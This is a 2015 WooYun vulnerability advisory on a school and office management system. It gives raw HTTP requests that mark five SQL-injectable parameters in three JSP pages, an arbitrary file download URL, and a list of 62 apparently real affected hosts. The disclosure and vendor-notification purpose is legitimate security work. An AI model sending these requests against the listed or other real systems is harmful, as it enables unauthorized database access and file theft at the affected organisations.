当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120851

漏洞标题:某通用型系统存在3处SQL注入&任意文件遍历(无需登录62案例)

相关厂商:无锡尚蠡信息科技有限公司

漏洞作者: YY-2012

提交时间:2015-06-17 15:28

修复时间:2015-09-20 09:40

公开时间:2015-09-20 09:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-17: 细节已通知厂商并且等待厂商处理中
2015-06-22: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向第三方安全合作伙伴开放
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

rt

详细说明:

无需登录下SQL注入&任意文件遍历。
3个文件5个参数存在过滤不当导致SQL注入

GET /inc/reviews_choose.jsp?currentPage=&pageSize=&reviewsType=1 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://222.191.250.100:81/
Cookie: JSESSIONID=750fc5e16ae838dbcfb37018b7ae
Host: 222.191.250.100:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*


参数reviewsType

POST /inc/user_choose_content.jsp?uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on&uc=on HTTP/1.1
Content-Length: 249
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.191.250.100:81/
Cookie: JSESSIONID=750fc5e16ae838dbcfb37018b7ae
Host: 222.191.250.100:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
chkType=checkbox&classId=&currentPage=1&deptId=1&driver=&dutyCode=&gradeId=&keywords=&schoolId=&subjectId=&userType=


参数deptId,subjectId,userType

POST /inc/user_choose_stu.jsp HTTP/1.1
Content-Length: 179
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.191.250.100:81/
Cookie: JSESSIONID=750fc5e16ae838dbcfb37018b7ae
Host: 222.191.250.100:81
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
classId=1&keywords=1&role=&userId=0&userType=0


参数classId
无需登录下任意文件遍历

http://url/download.jsp?filename=download.jsp

漏洞证明:

aaaaaaaaaaaaaa111111111111111111.jpg


aaaaaaaaaa222222222222222.jpg


aaaaaaaaaaa33333333333.jpg


aaaaaaaaaaaa4444444444444444.jpg


aaaaaaaaa5555555555555555.jpg


aaaaaaaaa6666666666666666666.jpg


aaaaaaaaaa666666666666666.jpg


附62个案例:

http://218.94.154.130:81/
http://zd9z.com:81/
http://111.17.169.131:81/
http://111.17.169.149:81/
http://111.17.169.166:81/
http://222.134.129.206:8000/
http://61.156.236.21:81/
http://222.187.85.118:81/
http://222.191.250.100:81/
http://218.56.104.94:8080/
http://221.178.218.27:8080/
http://222.134.153.142:8080/
http://58.214.37.230:81/
http://218.90.180.10:81/
http://218.93.12.84/
http://work.czhmx.cn/
http://58.213.62.98:8080/
http://61.153.103.195:81/
http://61.153.103.76:81/
http://218.2.115.124:8080/
http://218.2.115.126:8080/
http://122.227.165.54/
http://yysyzx.cn:8181/
http://222.134.89.202:88/
http://oa.caxx.net/
http://116.255.211.100:81/
http://218.90.182.62:8080/
http://123.178.103.34:8080/
http://111.17.169.218:81/
http://222.190.121.38:81/
http://60.210.115.58:81/
http://221.214.211.100:8000/
http://218.56.97.130:81/
http://zj.htjy.net/
http://218.90.156.238/
http://218.201.123.88:81/
http://218.94.126.226:8080/
http://oa.yyymzx.com/
http://61.153.103.76/
http://122.5.105.27/
http://oa.hqcxx.net/
http://222.134.89.198/
http://222.134.77.78:8080/
http://yysyzx.cn:8181/
http://60.210.115.62:8181/
http://218.90.182.62:8080/
http://218.2.115.126:8080/
http://218.94.126.226:8080/
http://221.214.211.100:8000/
http://222.187.85.118:81/
http://218.94.154.130:81/
http://218.56.97.130:81/
http://111.17.169.149:81/
http://222.74.103.162:81/
http://111.17.169.218:81/
http://111.17.169.166:81/
http://222.186.112.181:81/
http://122.5.105.210:81/
http://222.191.250.100:81/
http://218.90.180.10:81/

修复方案:

过滤

版权声明:转载请注明来源 YY-2012@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-06-22 09:39

厂商回复:

cnvd确认并复现所述情况,转由cncert下发给江苏分中心,由其后续协调网站管理单位处置。

最新状态:

暂无